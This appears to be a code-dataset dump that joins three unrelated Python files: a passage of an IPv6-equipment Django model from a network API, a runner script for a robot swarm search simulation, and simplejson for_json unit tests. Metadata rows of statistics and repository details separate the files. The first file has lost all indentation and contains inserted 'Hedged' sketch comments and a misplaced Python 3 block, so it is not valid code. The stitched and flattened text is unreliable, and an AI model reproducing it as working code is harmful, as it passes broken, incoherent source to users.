@raise IpCantBeRemovedFromVip: Ipv6 is associated with created
Vip Request.
"""
try:
for vip in self.viprequest_set.all():
id_vip = vip.id
with distributedlock(LOCK_VIP % id_vip):
if vip.created:
raise IpCantBeRemovedFromVip(
id_vip,
'IPv6 can not be removed because it is '
'in use by Vip Request %s' % (id_vip))
# Deletes only the VIP; the Ipv6 related to the VIP is not removed
vip.delete_v3(bypass_ipv4=True, bypass_ipv6=True)
# Deletes Related Equipment
for ip_eqpt in self.ipv6equipament_set.all():
ip_eqpt.delete_v3()
# Serializes obj
ip_slz = get_app('api_ip', module_label='serializers')
serializer = ip_slz.Ipv6V3Serializer(self)
data_to_queue = serializer.data
# Deletes Obj IP
super(Ipv6, self).delete()
# Sends to Queue
queue_manager = QueueManager()
data_to_queue.update({'description': queue_keys.IPv6_REMOVE})
queue_manager.append({
'action': queue_keys.IPv6_REMOVE,
'kind': queue_keys.IPv6_KEY,
'data': data_to_queue
})
queue_manager.send()
except IpCantBeRemovedFromVip, e:
raise IpCantBeRemovedFromVip(e.cause, e.message)
class Ipv6Equipament(BaseModel):
id = models.AutoField(
primary_key=True,
db_column='id_ipsv6_dos_equipamentos'
)
ip = models.ForeignKey(
'ip.Ipv6',
db_column='id_ipv6'
)
equipamento = models.ForeignKey(
'equipamento.Equipamento',
db_column='id_equip'
)
log = logging.getLogger('Ipv6Equipament')
class Meta(BaseModel.Meta):
db_table = u'ipsv6_dos_equipamentos'
managed = True
unique_together = ('ip', 'equipamento')
@classmethod
def list_by_equip(cls, equip_id):
"""Get IP6 by id_ip
@return: IPEquipment.
@raise IpEquipmentNotFoundError: IP6 is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return Ipv6Equipament.objects.filter(equipamento__id=equip_id)
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'There is no IP-Equipment with Equip = %s.' % equip_id)
except Exception, e:
cls.log.error(u'Failure to search the Ip-Equipment.')
raise IpError(e, u'Failure to search the Ip-Equipment.')
@classmethod
def get_by_ip6(cls, ip6_id):
"""Get IP6 by id_ip6
@return: IP6.
@raise IpEquipmentNotFoundError: IP6 is not registered.
@raise IpError: Failed to search for the I6P.
"""
try:
return Ipv6Equipament.objects.filter(ip__id=ip6_id).uniqueResult()
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'There is no IP-Equipment with IP = %s.' % ip6_id)
except Exception, e:
cls.log.error(u'Failure to search the Ip-Equipment.')
raise IpError(e, u'Failure to search the Ip-Equipment.')
@classmethod
def list_by_ip6(cls, ip6_id):
"""Get IP6 by id_ip6
@return: IP6.
@raise IpEquipmentNotFoundError: IP6 is not registered.
@raise IpError: Failed to search for the I6P.
"""
try:
return Ipv6Equipament.objects.filter(ip__id=ip6_id)
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'There is no IP-Equipment with IP = %s.' % ip6_id)
except Exception, e:
cls.log.error(u'Failure to search the Ip-Equipment.')
raise IpError(e, u'Failure to search the Ip-Equipment.')
@classmethod
def get_by_ip_equipment(cls, ip_id, equip_id):
"""Get Ipv6Equipament by ip_id and equip_id.
@return: Ipv6Equipament.
@raise IpEquipmentNotFoundError: Ipv6Equipament is not registered.
@raise IpError: Failed to search for the Ipv6Equipament.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return Ipv6Equipament.objects.filter(ip__id=ip_id, equipamento__id=equip_id).uniqueResult()
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'There is no Ipv6Equipament with ip_id = %s and equip_id = %s.' % (ip_id, equip_id))
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the Ipv6Equipament.')
raise IpError(e, u'Failure to search the Ipv6Equipament.')
def validate_ip(self):
""" Validates whether IPv6 is already associated with equipment
@raise IpEquipamentoDuplicatedError: if IPv6 is already associated with equipment
"""
try:
Ipv6Equipament.objects.get(
ip=self.ip, equipamento=self.equipamento)
raise IpEquipamentoDuplicatedError(
None, u'IP already registered for the equipment.')
except ObjectDoesNotExist:
pass
def create(self, authenticated_user, ip_id, equipment_id):
"""Insere um relacionamento entre IP e Equipamento.
@return: Nothing.
@raise IpError: Falha ao inserir.
@raise EquipamentoNotFoundError: Equipamento não cadastrado.
@raise IpNotFoundError: Ip não cadastrado.
@raise IpEquipamentoDuplicatedError: IP já cadastrado para o equipamento.
@raise EquipamentoError: Falha ao pesquisar o equipamento.
"""
self.equipamento = Equipamento().get_by_pk(equipment_id)
self.ip = Ipv6().get_by_pk(ip_id)
# Validate the ip
self.validate_ip()
try:
if self.equipamento not in [ea.equipamento for ea in self.ip.networkipv6.vlan.ambiente.equipamentoambiente_set.all()]:
ea = EquipamentoAmbiente(
ambiente=self.ip.networkipv6.vlan.ambiente, equipamento=self.equipamento)
ea.save(authenticated_user)
self.save()
except Exception, e:
self.log.error(u'Failure to insert an ip_equipamento.')
raise IpError(e, u'Failure to insert an ip_equipamento.')
def remove(self, authenticated_user, ip_id, equip_id):
"""Research and removes the relationship between IP and equipment.
@return: Nothing
@raise IpEquipmentNotFoundError: Dont is no relationship between the IP and Equipment.
@raise IpError: Failure to remove the relationship.
"""
ip_equipamento = self.get_by_ip_equipment(ip_id, equip_id)
try:
ip_equipamento.delete()
except (IpCantBeRemovedFromVip, IpEquipCantDissociateFromVip), e:
raise e
except Exception, e:
self.log.error(u'Failure to remove the Ipv6Equipament.')
raise IpError(e, u'Failure to remove the Ipv6Equipament.')
def delete(self):
"""Override Django's method to remove Ipv6 and Equipment relationship.
If Ip from this Ip-Equipment is associated with created Vip Request, and the Equipment
is the last balancer associated, the IpEquipment association cannot be removed.
If Ip has no relationship with other Equipments, then Ip is also removed.
"""
for r in self.ip.requisicaovips_set.all():
if self.equipamento.tipo_equipamento == TipoEquipamento.get_tipo_balanceador():
# Get all equipments (except the one being removed) related to ip
# to find another balancer
other_equips = self.ip.ipv6equipament_set.exclude(
equipamento=self.equipamento.id)
another_balancer = False
for ipequip in other_equips:
if ipequip.equipamento.tipo_equipamento == TipoEquipamento.get_tipo_balanceador():
another_balancer = True
break
if not another_balancer:
if r.vip_criado:
raise IpEquipCantDissociateFromVip(
{
'vip_id': r.id,
'ip': mount_ipv6_string(self.ip),
'equip_name': self.equipamento.nome
}, 'Ipv6 cannot be dissociated from equipment %s '
'because it is the last balancer of Vip Request %s.' %
(self.equipamento.nome, r.id))
else:
# Remove ip from vip or remove vip
id_vip = r.id
if r.ip is not None:
r.ipv6 = None
r.validado = 0
r.save()
# SYNC_VIP
syncs.old_to_new(r)
else:
r.delete()
# SYNC_VIP
syncs.delete_new(id_vip)
if self.ip.serverpoolmember_set.count() > 0:
server_pool_identifiers = set()
for svm in self.ip.serverpoolmember_set.all():
item = '{}:{}'.format(svm.server_pool.id,
svm.server_pool.identifier)
server_pool_identifiers.add(item)
server_pool_identifiers = list(server_pool_identifiers)
server_pool_identifiers = ', '.join(
str(server_pool) for server_pool in server_pool_identifiers)
raise IpCantRemoveFromServerPool(
{
'ip': mount_ipv6_string(self.ip),
'equip_name': self.equipamento.nome,
'server_pool_identifiers': server_pool_identifiers
},
'Ipv6 cannot be dissociated from equipment %s '
'because it is being used in the Server Pools '
'(id:identifier) %s' % (
self.equipamento.nome, server_pool_identifiers)
)
super(Ipv6Equipament, self).delete()
# If the ip has no other equipment, it will be removed too
if self.ip.ipv6equipament_set.count() == 0:
self.ip.delete()
def delete_v3(self):
"""
Method V3 to remove Ipv6 and Equipment relationship.
If Ipv6 from this Ipv6-Equipment is associated with created Vip
Request and the Equipment is the last balancer associated,
the IpEquipment association cannot be removed.
If Ipv6 has no relationship with other Equipments, then Ipv6 is
also removed.
@raise IpCantRemoveFromServerPool: Ip is associated with a
Pool Member.
@raise IpEquipCantDissociateFromVip: Equipment is the last balancer
in a created Vip Request
pointing to ip.
"""
type_eqpt = TipoEquipamento.get_tipo_balanceador()
if self.equipamento.tipo_equipamento == type_eqpt:
for vip in self.ip.viprequest_set.all():
# Filter equipments to find another balancer
another_balancer = self.ip.ipv6equipament_set.exclude(
equipamento=self.equipamento.id
).filter(equipamento__tipo_equipamento=type_eqpt)
id_vip = vip.id
if not another_balancer:
with distributedlock(LOCK_VIP % id_vip):
if vip.created:
raise IpEquipCantDissociateFromVip(
{
'vip_id': id_vip,
'ip': self.ip.ip_formated,
'equip_name': self.equipamento.nome
},
'Ipv6 can not be dissociated from the '
'equipment %s because it is the last '
'balancer of Vip Request %s.'
% (self.equipamento.nome, id_vip)
)
else:
# Remove ipv6 from vip
if vip.ipv4 is not None:
vip.ipv6 = None
vip.save()
# SYNC_VIP
syncs.new_to_old(vip)
# Remove vip
else:
vip.delete_v3(bypass_ipv4=True,
bypass_ipv6=True)
if self.ip.serverpoolmember_set.count() > 0:
items = ['{}:{}'.format(
svm.server_pool.id,
svm.server_pool.identifier
) for svm in self.ip.serverpoolmember_set.all()]
items = ', '.join(items)
raise IpCantRemoveFromServerPool(
{
'ip': self.ip.ip_formated,
'equip_name': self.equipamento.nome,
'server_pool_identifiers': items
},
'IPv6 can not be dissociated from the equipment %s because it '
'is being used in the Server Pools (id:identifier) %s' %
(self.equipamento.nome, items)
)
super(Ipv6Equipament, self).delete()
# If the ip has no other equipment, then it will be removed too
if self.ip.ipv6equipament_set.count() == 0:
self.ip.delete_v3()
def create_v3(self, ip_equipment):
"""Inserts a relationship between IP e Equipment.
@return: Nothing.
@raise IpError: Failure to insert.
@raise EquipamentoNotFoundError: Equipment do not registered.
@raise IpNotFoundError: Ip do not registered.
@raise IpEquipamentoDuplicatedError: IP already registered for the equipment.
@raise EquipamentoError: Failure to search equipment.
"""
self.equipamento = Equipamento().get_by_pk(ip_equipment.get('equipment'))
self.ip = Ipv6().get_by_pk(ip_equipment.get('ip'))
# Validate the ip
self.__validate_ip()
try:
# All equipments related with environment of IP
eqpts = self.ip.networkipv6.vlan.ambiente\
.equipamentoambiente_set.all()\
.values_list('equipamento', flat=True)
if ip_equipment.get('equipment') not in eqpts:
ea = EquipamentoAmbiente(
ambiente=self.ip.networkipv6.vlan.ambiente,
equipamento=self.equipamento
)
ea.save()
self.save()
except Exception as e:
self.log.error(u'Failure to insert an ip_equipamento.')
raise IpError(e, u'Failure to insert an ip_equipamento.')
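# Hedged usage sketch for create_v3 above (the payload keys mirror the
# .get() calls in the method; the primary-key values are invented):
#     Ipv6Equipament().create_v3({'equipment': 42, 'ip': 7})
# would associate Ipv6 pk 7 with Equipamento pk 42, first creating the
# EquipamentoAmbiente link when the equipment is not yet part of the
# network's environment.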
def network_in_range(vlan, network, version):
# Get all vlans environments from equipments of the current
# environment
equips = list()
envs = list()
envs_aux = list()
ids_all = list()
ambiente = vlan.ambiente
filter = ambiente.filter
equipment_types = TipoEquipamento.objects.filter(
filterequiptype__filter=filter)
# Get all equipments from the environment being tested
# that are not supposed to be filtered
# (not the same type of the equipment type of a filter of the environment)
for env in ambiente.equipamentoambiente_set.all().exclude(
equipamento__tipo_equipamento__in=equipment_types
).select_related('equipamento'):
equips.append(env.equipamento)
# Get all environment that the equipments above are included
for equip in equips:
for env in equip.equipamentoambiente_set.all().select_related('ambiente'):
if env.ambiente_id not in envs_aux:
envs.append(env.ambiente)
envs_aux.append(env.ambiente_id)
# Check in all vlans from all environments above
# if there is a network that is sub or super network of the current
# network being tested
for env in envs:
for vlan in env.vlan_set.all().prefetch_related(
'networkipv4_set'
).prefetch_related('networkipv6_set'):
ids_all.append(vlan.id)
is_subnet = verify_subnet(vlan, network, version)
if is_subnet:
return False
return True
def verify_subnet(vlan, network, version):
from networkapi.infrastructure.ipaddr import IPNetwork
if version == IP_VERSION.IPv4[0]:
vlan_net = vlan.networkipv4_set.all()
else:
vlan_net = vlan.networkipv6_set.all()
# One vlan may have many networks, iterate over it
for net in vlan_net:
if version == IP_VERSION.IPv4[0]:
ip = '%s.%s.%s.%s/%s' % (net.oct1,
net.oct2, net.oct3, net.oct4, net.block)
else:
ip = '%s:%s:%s:%s:%s:%s:%s:%s/%d' % (
net.block1, net.block2, net.block3, net.block4,
net.block5, net.block6, net.block7, net.block8, net.block)
ip_net = IPNetwork(ip)
# If some network, inside this vlan, is subnet of network search param
if ip_net in network or network in ip_net:
# This vlan must be among the vlans found; no need to continue
# checking
return True
# If no subnet was found, return False
return False
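# Hedged illustration of the containment test in verify_subnet(). This module
# uses the project's bundled networkapi.infrastructure.ipaddr, where `a in b`
# holds when network `a` is a subnet of `b`; the sketch below only assumes the
# analogous stdlib behaviour of ipaddress (two CIDR blocks overlap exactly
# when one contains the other):
if __name__ == '__main__':
    from ipaddress import ip_network
    sub, sup = ip_network('10.0.1.0/24'), ip_network('10.0.0.0/16')
    print(sub.overlaps(sup))  # True: the /24 sits inside the /16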
| 38.742148 | 216 | 0.568982 | 17,348 | 159,114 | 5.078049 | 0.041042 | 0.006357 | 0.007696 | 0.008037 | 0.857391 | 0.834699 | 0.808137 | 0.79061 | 0.773435 | 0.760018 | 0 | 0.020681 | 0.345413 | 159,114 | 4,106 | 217 | 38.751583 | 0.825124 | 0.086202 | 0 | 0.718938 | 0 | 0.004825 | 0.111519 | 0.009571 | 0 | 0 | 0 | 0.000731 | 0 | 0 | null | null | 0.004825 | 0.012465 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
90b759e437a1233b44e67f803ee1ef47332c1944 | 15,479 | py | Python | runner.py | kevintsq/SwarmSearchSimulation | 806a5a173217c39cd015caced43d584da4ad8b3d | [
"MIT"
] | null | null | null | runner.py | kevintsq/SwarmSearchSimulation | 806a5a173217c39cd015caced43d584da4ad8b3d | [
"MIT"
] | null | null | null | runner.py | kevintsq/SwarmSearchSimulation | 806a5a173217c39cd015caced43d584da4ad8b3d | [
"MIT"
] | 2 | 2021-09-22T11:07:44.000Z | 2021-12-29T14:16:49.000Z | import pickle
import sys
from multiprocessing import Pool, Lock
from logger import *
from robot_manager import *
lock = Lock()
class AbstractRunner(ABC):
def __init__(self):
with lock:
self.logger = Logger(reset=True)
# self.logger.start()
@abstractmethod
def run(self, *args, **kwargs):
pass
def run(i, site_width, site_height, generator, depart_from_edge, robot_type, robot_cnt,
max_search_action_cnt, max_return_action_cnt):
try:
with lock:
logger = Logger()
layout = Layout.from_generator(generator, enable_display=False, depart_from_edge=depart_from_edge)
manager = RandomSpreadingRobotManager(robot_type, logger, layout, robot_cnt,
depart_from_edge=depart_from_edge, initial_gather_mode=False)
while not (layout or manager.action_count >= max_search_action_cnt):
manager.update()
if manager.action_count % 100 == 0:
with lock:
logger.log(i, site_width, site_height, generator.room_cnt, generator.injuries,
'Edge' if depart_from_edge else 'Center', robot_type.__name__, robot_cnt,
'Search', *layout.report(), 0, *manager.report_search())
with lock:
logger.log(i, site_width, site_height, generator.room_cnt, generator.injuries,
'Edge' if depart_from_edge else 'Center', robot_type.__name__, robot_cnt,
'SearchFinished', *layout.report(), 0, *manager.report_search())
if robot_type != Robot and robot_type != RobotUsingGas:
manager.enter_gathering_mode()
while not (manager or manager.action_count - manager.first_injury_action_count >= max_return_action_cnt):
manager.update()
if manager.action_count % 100 == 0:
with lock:
logger.log(i, site_width, site_height, generator.room_cnt, generator.injuries,
'Edge' if depart_from_edge else 'Center', robot_type.__name__, robot_cnt,
'Return', *layout.report(), manager.report_gather(), *manager.report_search())
with lock:
logger.log(i, site_width, site_height, generator.room_cnt, generator.injuries,
'Edge' if depart_from_edge else 'Center', robot_type.__name__, robot_cnt,
'ReturnFinished', *layout.report(), manager.report_gather(), *manager.report_search())
except Exception:
with lock:
if not os.path.exists("debug"):
os.mkdir("debug")
with open(f"debug/gen_dbg_{i}.pkl", "wb") as file:
pickle.dump(generator, file)
import traceback
traceback.print_exc()
finally:
logger.close()
class StatisticRunner(AbstractRunner):
def __init__(self):
super().__init__()
def run(self):
site_width, site_height, room_cnt, injury_cnt, max_search_action_cnt, max_return_action_cnt =\
120, 60, 120, 10, 4000, 1000
workers = []
with Pool() as p:
for i in range(config.MAX_ITER):
try:
generator = SiteGenerator(site_width, site_height, room_cnt, injury_cnt)
except Exception:
print(f"Generation {i} failed. Skipped.", file=sys.stderr)
continue
for robot_cnt in (2, 4, 6, 8, 10):
for robot_type in (RandomRobot, Robot, RobotUsingSound, RobotUsingGas, RobotUsingGasAndSound):
workers.append(p.apply_async(run, (i, site_width, site_height, generator, False, robot_type,
robot_cnt, max_search_action_cnt, max_return_action_cnt)))
workers.append(p.apply_async(run, (i, site_width, site_height, generator, True, robot_type,
robot_cnt, max_search_action_cnt, max_return_action_cnt)))
cnt = len(workers)
for i, worker in enumerate(workers):
worker.wait()
print(f"{i + 1} of {cnt} ({(i + 1) * 100 / cnt: .2f}%) finished with status {worker.get()}.")
# self.logger.stop()
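# A self-contained sketch of the fan-out/collect pattern used by
# StatisticRunner.run above, with a trivial worker in place of the
# simulation (_square and _demo_pool are illustrative names only):
def _square(x):
    return x * x

def _demo_pool():
    with Pool() as p:
        workers = [p.apply_async(_square, (i,)) for i in range(4)]
        # .get() blocks until each async result is ready
        return [w.get() for w in workers]  # -> [0, 1, 4, 9]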
class GatheringStatisticRunner(AbstractRunner):
def __init__(self):
super().__init__()
def run(self):
robot_cnt = 8
# self.logger.info("site_width,site_height,room_cnt,robot_type,robot_cnt,total_action_cnt,total_returned_cnt")
for i in range(config.MAX_ITER):
site_width, site_height, room_cnt, injury_cnt, robot_type = 120, 60, 120, 1, RobotUsingGasAndSound
try:
generator = SiteGenerator(site_width, site_height, room_cnt, injury_cnt)
except Exception:
print(f"Generation {i} failed. Skipped.", file=sys.stderr)
continue
try:
layout = Layout.from_generator(generator, enable_display=False, depart_from_edge=False)
manager = RandomSpreadingRobotManager(robot_type, self.logger, layout, robot_cnt,
depart_from_edge=False, initial_gather_mode=True)
while True:
if manager or manager.first_injury_action_count != 0 and \
manager.action_count - manager.first_injury_action_count >= 1000:
# all robots have completed their missions
# self.logger.info(f"{site_width},{site_height},{generator.room_cnt},{robot_type.__name__},"
# f"{robot_cnt},{manager.report_gather()}")
break
manager.update()
except Exception:
if not os.path.exists("debug"):
os.mkdir("debug")
with open(f"debug/gen_dbg_{i}.pkl", "wb") as file:
pickle.dump(generator, file)
import traceback
traceback.print_exc()
# self.logger.stop()
class DebugRunner(AbstractRunner):
def __init__(self):
super().__init__()
pygame.init()
pygame.display.set_caption("Simulation")
def run(self):
with open("debug/gen_dbg.pkl", "rb") as file:
generator: SiteGenerator = pickle.load(file)
layout = Layout.from_generator(generator, depart_from_edge=False)
manager = SpreadingRobotManager(RobotUsingGasAndSound, self.logger, layout, 8,
depart_from_edge=False, initial_gather_mode=False)
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
# self.logger.stop()
exit()
elif event.type == KEYDOWN:
if event.key == K_SPACE:
layout.update()
manager.update()
pygame.display.update()
class TestRunner(AbstractRunner):
def __init__(self):
super().__init__()
pygame.init()
pygame.display.set_caption("Simulation")
def run(self):
layout = Layout.from_file("assets/test.lay")
manager = SpreadingRobotManager(RobotUsingGasAndSound, self.logger, layout, 1,
depart_from_edge=False, initial_gather_mode=False)
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
# self.logger.stop()
exit()
elif event.type == KEYDOWN:
if event.key == K_SPACE:
layout.update()
manager.update()
pygame.display.update()
class PresentationRunner(AbstractRunner):
def __init__(self):
super().__init__()
pygame.init()
pygame.display.set_caption("Simulation")
def run(self):
generator = SiteGenerator(120, 60, 120, 10)
try:
layout = Layout.from_generator(generator, depart_from_edge=False)
manager = RandomSpreadingRobotManager(RobotUsingGasAndSound, self.logger, layout, 8,
depart_from_edge=False, initial_gather_mode=False)
clock = pygame.time.Clock()
frame_rate = config.DISPLAY_FREQUENCY
while True:
for event in pygame.event.get():
if event.type == QUIT:
if not os.path.exists("debug"):
os.mkdir("debug")
with open("debug/gen_dbg.pkl", "wb") as file:
pickle.dump(generator, file)
pygame.quit()
# self.logger.stop()
exit()
elif event.type == KEYDOWN:
if event.key == K_SPACE:
config.PAUSE = not config.PAUSE
if event.key == K_UP and frame_rate < config.DISPLAY_FREQUENCY:
frame_rate += 5
if event.key == K_DOWN and frame_rate > 5:
frame_rate -= 5
if not config.PAUSE:
if all(layout.rooms) and all(layout.injuries): # have been visited and rescued
config.PAUSE = True
layout.update()
manager.update()
pygame.display.update()
# clock.tick(frame_rate)
except Exception:
if not os.path.exists("debug"):
os.mkdir("debug")
with open("debug/gen_dbg.pkl", "wb") as file:
pickle.dump(generator, file)
import traceback
traceback.print_exc()
class DebugPresentationRunner(AbstractRunner):
def __init__(self):
super().__init__()
pygame.init()
pygame.display.set_caption("Simulation")
def run(self):
with open("debug/gen_dbg.pkl", "rb") as file:
generator: SiteGenerator = pickle.load(file)
layout = Layout.from_generator(generator, depart_from_edge=False)
manager = RandomSpreadingRobotManager(RobotUsingGas, self.logger, layout, 10,
depart_from_edge=False, initial_gather_mode=False)
clock = pygame.time.Clock()
frame_rate = config.DISPLAY_FREQUENCY
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
# self.logger.stop()
exit()
elif event.type == KEYDOWN:
if event.key == K_SPACE:
config.PAUSE = not config.PAUSE
if event.key == K_UP and frame_rate < config.DISPLAY_FREQUENCY:
frame_rate += 5
if event.key == K_DOWN and frame_rate > 5:
frame_rate -= 5
if all(layout.rooms) and all(layout.injuries): # have been visited and rescued
config.PAUSE = True
if not config.PAUSE:
layout.update()
manager.update()
pygame.display.update()
clock.tick(frame_rate)
class StatisticPresentationRunner(AbstractRunner):
def __init__(self):
super().__init__()
pygame.init()
pygame.display.set_caption("Simulation")
def run(self):
robot_cnt = 2
site_width, site_height, room_cnt, injury_cnt, robot_type = 120, 60, 120, 10, RobotUsingGasAndSound
generator = SiteGenerator(site_width, site_height, room_cnt, injury_cnt)
try:
layout = Layout.from_generator(generator, depart_from_edge=False)
manager = RandomSpreadingRobotManager(robot_type, self.logger, layout, robot_cnt,
depart_from_edge=False, initial_gather_mode=False)
clock = pygame.time.Clock()
frame_rate = config.DISPLAY_FREQUENCY
while not (layout or manager.action_count >= 500):
for event in pygame.event.get():
if event.type == QUIT:
if not os.path.exists("debug"):
os.mkdir("debug")
with open(f"debug/gen_dbg.pkl", "wb") as file:
pickle.dump(generator, file)
pygame.quit()
# self.logger.stop()
exit()
elif event.type == KEYDOWN:
if event.key == K_SPACE:
config.PAUSE = not config.PAUSE
if event.key == K_UP and frame_rate < config.DISPLAY_FREQUENCY:
frame_rate += 5
if event.key == K_DOWN and frame_rate > 5:
frame_rate -= 5
if not config.PAUSE:
layout.update()
manager.update()
pygame.display.update()
clock.tick(frame_rate)
manager.enter_gathering_mode()
while not (manager or manager.action_count - manager.first_injury_action_count >= 500):
for event in pygame.event.get():
if event.type == QUIT:
if not os.path.exists("debug"):
os.mkdir("debug")
with open(f"debug/gen_dbg.pkl", "wb") as file:
pickle.dump(generator, file)
pygame.quit()
# self.logger.stop()
exit()
elif event.type == KEYDOWN:
if event.key == K_SPACE:
config.PAUSE = not config.PAUSE
if event.key == K_UP and frame_rate < config.DISPLAY_FREQUENCY:
frame_rate += 5
if event.key == K_DOWN and frame_rate > 5:
frame_rate -= 5
if not config.PAUSE:
layout.update()
manager.update()
pygame.display.update()
clock.tick(frame_rate)
while True:
for event in pygame.event.get():
if event.type == QUIT:
if not os.path.exists("debug"):
os.mkdir("debug")
with open(f"debug/gen_dbg.pkl", "wb") as file:
pickle.dump(generator, file)
pygame.quit()
# self.logger.stop()
exit()
except Exception:
if not os.path.exists("debug"):
os.mkdir("debug")
with open(f"debug/gen_dbg.pkl", "wb") as file:
pickle.dump(generator, file)
import traceback
traceback.print_exc()
if __name__ == '__main__':
runner = PresentationRunner()
runner.run()
| 44.866667 | 118 | 0.52077 | 1,569 | 15,479 | 4.905035 | 0.115997 | 0.026897 | 0.036383 | 0.037032 | 0.836798 | 0.828093 | 0.803664 | 0.777547 | 0.756757 | 0.740255 | 0 | 0.010447 | 0.387816 | 15,479 | 344 | 119 | 44.997093 | 0.80171 | 0.03663 | 0 | 0.778523 | 0 | 0.003356 | 0.038673 | 0.00282 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057047 | false | 0.003356 | 0.030201 | 0 | 0.114094 | 0.02349 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2906bdb1451768f545267a78099698370a805f2f | 4,191 | py | Python | simplejson/tests/test_for_json.py | shakefu/simplejson | ad58a553fbc921e76700bc9d252b6fddcc70f51a | [
"AFL-2.1"
] | null | null | null | simplejson/tests/test_for_json.py | shakefu/simplejson | ad58a553fbc921e76700bc9d252b6fddcc70f51a | [
"AFL-2.1"
] | null | null | null | simplejson/tests/test_for_json.py | shakefu/simplejson | ad58a553fbc921e76700bc9d252b6fddcc70f51a | [
"AFL-2.1"
] | 1 | 2021-09-05T22:09:31.000Z | 2021-09-05T22:09:31.000Z | import unittest
import simplejson as json
class ForJson(object):
def for_json(self):
return {'for_json': 1}
class NestedForJson(object):
def for_json(self):
return {'nested': ForJson()}
class ForJsonList(object):
def for_json(self):
return ['list']
class DictForJson(dict):
def for_json(self):
return {'alpha': 1}
class ListForJson(list):
def for_json(self):
return ['list']
class TestForJsonWithSpeedups(unittest.TestCase):
def setUp(self):
if not json.encoder.c_make_encoder:
raise unittest.SkipTest("No speedups.")
@staticmethod
def _dump(obj):
return json.dumps(obj, for_json=True)
def test_for_json_encodes_stand_alone_object(self):
self.assertEqual(self._dump(ForJson()), '{"for_json": 1}')
def test_for_json_encodes_object_nested_in_dict(self):
self.assertEqual(self._dump({'hooray': ForJson()}), '{"hooray": '
'{"for_json": 1}}')
def test_for_json_encodes_object_nested_in_list_within_dict(self):
self.assertEqual(self._dump({'list': [0, ForJson(), 2, 3]}),
'{"list": [0, {"for_json": 1}, 2, 3]}')
def test_for_json_encodes_object_nested_within_object(self):
self.assertEqual(self._dump(NestedForJson()),
'{"nested": {"for_json": 1}}')
def test_for_json_encodes_list(self):
self.assertEqual(self._dump(ForJsonList()), '["list"]')
def test_for_json_encodes_list_within_object(self):
self.assertEqual(self._dump({'nested': ForJsonList()}),
'{"nested": ["list"]}')
def test_for_json_encodes_dict_subclass(self):
self.assertEqual(self._dump(DictForJson(a=1)), '{"alpha": 1}')
def test_for_json_encodes_list_subclass(self):
self.assertEqual(self._dump(ListForJson(['l'])), '["list"]')
def test_for_json_ignored_if_not_true_with_dict_subclass(self):
self.assertEqual(json.dumps(DictForJson(a=1)), '{"a": 1}')
def test_for_json_ignored_if_not_true_with_list_subclass(self):
self.assertEqual(json.dumps(ListForJson(['l'])), '["l"]')
def test_raises_typeerror_if_for_json_not_true_with_object(self):
self.assertRaises(TypeError, json.dumps, ForJson())
class TestForJsonWithoutSpeedups(unittest.TestCase):
def setUp(self):
if json.encoder.c_make_encoder:
json._toggle_speedups(False)
def tearDown(self):
if json.encoder.c_make_encoder:
json._toggle_speedups(True)
@staticmethod
def _dump(obj):
return json.dumps(obj, for_json=True)
def test_for_json_encodes_stand_alone_object(self):
self.assertEqual(self._dump(ForJson()), '{"for_json": 1}')
def test_for_json_encodes_object_nested_in_dict(self):
self.assertEqual(self._dump({'hooray': ForJson()}), '{"hooray": '
'{"for_json": 1}}')
def test_for_json_encodes_object_nested_in_list_within_dict(self):
self.assertEqual(self._dump({'list': [0, ForJson(), 2, 3]}),
'{"list": [0, {"for_json": 1}, 2, 3]}')
def test_for_json_encodes_object_nested_within_object(self):
self.assertEqual(self._dump(NestedForJson()),
'{"nested": {"for_json": 1}}')
def test_for_json_encodes_list(self):
self.assertEqual(self._dump(ForJsonList()), '["list"]')
def test_for_json_encodes_list_within_object(self):
self.assertEqual(self._dump({'nested': ForJsonList()}),
'{"nested": ["list"]}')
def test_for_json_encodes_dict_subclass(self):
self.assertEqual(self._dump(DictForJson(a=1)), '{"alpha": 1}')
def test_for_json_encodes_list_subclass(self):
self.assertEqual(self._dump(ListForJson(['l'])), '["list"]')
def test_for_json_ignored_if_not_true_with_dict_subclass(self):
self.assertEqual(json.dumps(DictForJson(a=1)), '{"a": 1}')
def test_for_json_ignored_if_not_true_with_list_subclass(self):
self.assertEqual(json.dumps(ListForJson(['l'])), '["l"]')
def test_raises_typeerror_if_for_json_not_true_with_object(self):
self.assertRaises(TypeError, json.dumps, ForJson())
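# A minimal usage sketch of the for_json hook exercised by the tests above
# (run directly; assumes simplejson is installed):
if __name__ == '__main__':
    class Point(object):
        def for_json(self):
            return {'x': 1, 'y': 2}

    # With for_json=True the encoder calls the hook instead of raising
    # TypeError for an otherwise unserializable object.
    print(json.dumps(Point(), for_json=True))  # {"x": 1, "y": 2}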
